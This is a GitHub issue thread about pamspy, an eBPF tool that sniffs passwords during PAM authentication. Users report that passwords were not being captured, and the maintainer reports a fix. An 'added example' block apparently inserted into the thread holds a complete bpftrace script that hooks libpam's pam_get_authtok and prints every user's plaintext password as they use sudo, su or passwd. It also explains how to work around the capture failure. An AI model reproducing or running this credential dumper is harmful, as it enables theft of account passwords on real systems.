Password not dumped within Kali VM #2

Closed
ariary opened this issue Jul 6, 2022 · 6 comments
Comments

ariary commented Jul 6, 2022

Issue:

  • Compilation OK, execution OK
  • Correctly catches sudo, su, etc. commands
  • Correctly catches the user initiating the command
  • Does not catch the password used

Output example:

2071   | sudo            | kali                 | 
3313   | sudo            | kali                 | 
4137   | sudo            | kali                 | 
4223   | passwd          | test                 | 

Additional information:

New to eBPF stuff etc., so I cannot find what causes this for now.

  • Kali is running in a VM
$ uname -a
Linux kali 5.15.0-kali3-amd64 #1 SMP Debian 5.15.15-2kali1 (2022-01-31) x86_64 GNU/Linux
$ /usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4
/lib/x86_64-linux-gnu/libpam.so.0
$ sudo ./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -v
libbpf: loading object 'pamspy_bpf' from buffer
libbpf: elf: section(2) uretprobe/pam_get_authtok, size 392, link 0, flags 6, type=1
libbpf: sec 'uretprobe/pam_get_authtok': found program 'trace_pam_get_authtok' at insn offset 0 (0 bytes), code size 49 insns (392 bytes)
libbpf: elf: section(3) license, size 13, link 0, flags 3, type=1
libbpf: license of pamspy_bpf is Dual BSD/GPL
libbpf: elf: section(4) .maps, size 16, link 0, flags 3, type=1
libbpf: elf: section(5) .BTF, size 1566, link 0, flags 0, type=1
libbpf: elf: section(6) .BTF.ext, size 572, link 0, flags 0, type=1
libbpf: elf: section(7) .symtab, size 144, link 12, flags 0, type=2
libbpf: elf: section(8) .reluretprobe/pam_get_authtok, size 16, link 7, flags 0, type=9
libbpf: looking for externs among 6 symbols...
libbpf: collected 0 externs total
libbpf: map 'rb': at sec_idx 4, offset 0.
libbpf: map 'rb': found type = 27.
libbpf: map 'rb': found max_entries = 262144.
libbpf: sec '.reluretprobe/pam_get_authtok': collecting relocation for section(2) 'uretprobe/pam_get_authtok'
libbpf: sec '.reluretprobe/pam_get_authtok': relo #0: insn #21 against 'rb'
libbpf: prog 'trace_pam_get_authtok': found map 0 (rb, sec 4, off 0) for insn #21
libbpf: loading kernel BTF '/sys/kernel/btf/vmlinux': 0
libbpf: map 'rb': created successfully, fd=4
libbpf: sec 'uretprobe/pam_get_authtok': found 3 CO-RE relocations
libbpf: CO-RE relocating [10] struct pt_regs: found target candidate [174] struct pt_regs in [vmlinux]
libbpf: prog 'trace_pam_get_authtok': relo #0: <byte_off> [10] struct pt_regs.di (0:14 @ offset 112)
libbpf: prog 'trace_pam_get_authtok': relo #0: matching candidate #0 <byte_off> [174] struct pt_regs.di (0:14 @ offset 112)
libbpf: prog 'trace_pam_get_authtok': relo #0: patched insn #1 (LDX/ST/STX) off 112 -> 112
libbpf: prog 'trace_pam_get_authtok': relo #1: <byte_off> [10] struct pt_regs.dx (0:12 @ offset 96)
libbpf: prog 'trace_pam_get_authtok': relo #1: matching candidate #0 <byte_off> [174] struct pt_regs.dx (0:12 @ offset 96)
libbpf: prog 'trace_pam_get_authtok': relo #1: patched insn #3 (LDX/ST/STX) off 96 -> 96
libbpf: prog 'trace_pam_get_authtok': relo #2: <byte_off> [10] struct pt_regs.dx (0:12 @ offset 96)
libbpf: prog 'trace_pam_get_authtok': relo #2: matching candidate #0 <byte_off> [174] struct pt_regs.dx (0:12 @ offset 96)
libbpf: prog 'trace_pam_get_authtok': relo #2: patched insn #9 (LDX/ST/STX) off 96 -> 96
[...]
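As an added example (not pamspy's own code), the bpftrace script below does what the libbpf log above describes: it attaches to pam_get_authtok in libpam and reads the password through the function's `const char **authtok` out-parameter. It records that pointer at function entry rather than reading registers at return, because on x86-64 rdi and rdx are caller-saved and are not guaranteed to still hold the arguments when the uretprobe fires, and it prints a marker whenever the out-pointer comes back empty, which is the symptom reported in this issue. The libpam path and the helper struct `authtok_out` are assumptions; take the real path from the `ldconfig -p` command shown above.

```bpftrace
#!/usr/bin/env bpftrace
// Added example, not part of pamspy. Run as root: sudo bpftrace pam_authtok.bt
// The library path below is an assumption; obtain it with:
//   ldconfig -p | grep libpam.so
//
// Prototype being hooked (from <security/pam_appl.h>):
//   int pam_get_authtok(pam_handle_t *pamh, int item,
//                       const char **authtok, const char *prompt);

// Hypothetical helper struct so the `const char **` out-parameter can be
// dereferenced as a struct member instead of an integer pointer cast.
struct authtok_out {
    const char *token;
};

BEGIN
{
    printf("%-6s | %-15s | %-8s | %s\n", "PID", "COMM", "UID", "AUTHTOK");
}

// Entry probe: arguments are valid here. Remember where the callee will
// store the token pointer, keyed by thread id.
uprobe:/lib/x86_64-linux-gnu/libpam.so.0:pam_get_authtok
{
    @authtok_pp[tid] = arg2;
}

// Return probe: rdi/rdx may already be clobbered, so argN is not used here.
// Only fire for threads that were seen entering the function.
uretprobe:/lib/x86_64-linux-gnu/libpam.so.0:pam_get_authtok
/@authtok_pp[tid] != 0/
{
    $out = (struct authtok_out *)@authtok_pp[tid];
    delete(@authtok_pp[tid]);

    // PAM_SUCCESS is 0. A non-zero return code, or a NULL pointer behind
    // the out-parameter, is exactly the "password not dumped" case.
    if (retval == 0 && (uint64)$out->token != 0) {
        printf("%-6d | %-15s | %-8d | %s\n", pid, comm, uid, str($out->token));
    } else {
        printf("%-6d | %-15s | %-8d | <no token via out-param, rc=%d>\n",
               pid, comm, uid, retval);
    }
}

END
{
    clear(@authtok_pp);
}
```

Run it in one terminal, then `sudo -k; sudo true` or `su` in another; a row ending in `<no token via out-param, ...>` reproduces the symptom in this thread, and in that situation the token has to be taken from the PAM handle itself, which is what the maintainer's fix below does. One caveat on the `$(ldconfig -p | grep libpam.so | cut -d ' ' -f4)` idiom used above: on a multiarch system with both i386 and x86-64 libpam installed it prints two paths, which the shell then passes as two separate arguments to `-p`, so check that it yields exactly one line.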
cr4m05 commented Jul 6, 2022

Same problem for me: I can't dump credentials on a Kali VM (or WSL) or on an Arch VM.

[screenshot attached]

citronneur (Owner) commented

Thanks! I fixed it in the new release!

citronneur (Owner) commented

It was due to the way your PAM config manages the auth token, so I decided to retrieve the token directly from the handler. Thanks for sharing, it's really appreciated.

citronneur (Owner) commented

Let me know if it's OK for you.

cr4m05 commented Jul 6, 2022

Done!
It's working now. Thanks!!

ariary commented Jul 6, 2022

Works like a charm! Thank you for the tool and your reactivity.
